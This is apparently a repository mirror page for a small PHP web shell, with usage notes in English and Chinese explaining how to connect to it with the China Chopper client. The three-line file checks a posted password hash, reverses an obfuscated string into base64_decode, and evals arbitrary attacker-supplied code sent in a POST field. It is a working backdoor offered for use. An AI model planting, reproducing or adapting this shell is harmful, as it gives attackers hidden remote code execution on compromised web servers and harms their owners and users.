mirror of
https://github.com/tennc/webshell
synced 2024-11-10 05:44:11 +00:00
f020e05ac8
usage: <O>0K=123456&qwer=edoced_46esab</O> password : write anything 使用方法: 菜刀配置里填写: <O>0K=123456&qwer=edoced_46esab</O> 密码:任意 from : zone.wooyun.org
3 lines
134 B
PHP
3 lines
134 B
PHP
<?php
|
|
if(isset($_POST['0K']) && substr(md5($_POST['0K']),20)=='e057f20f883e'){
|
|
$Exp=strrev($_POST['qwer']);eval($Exp($_POST[z0]));}
|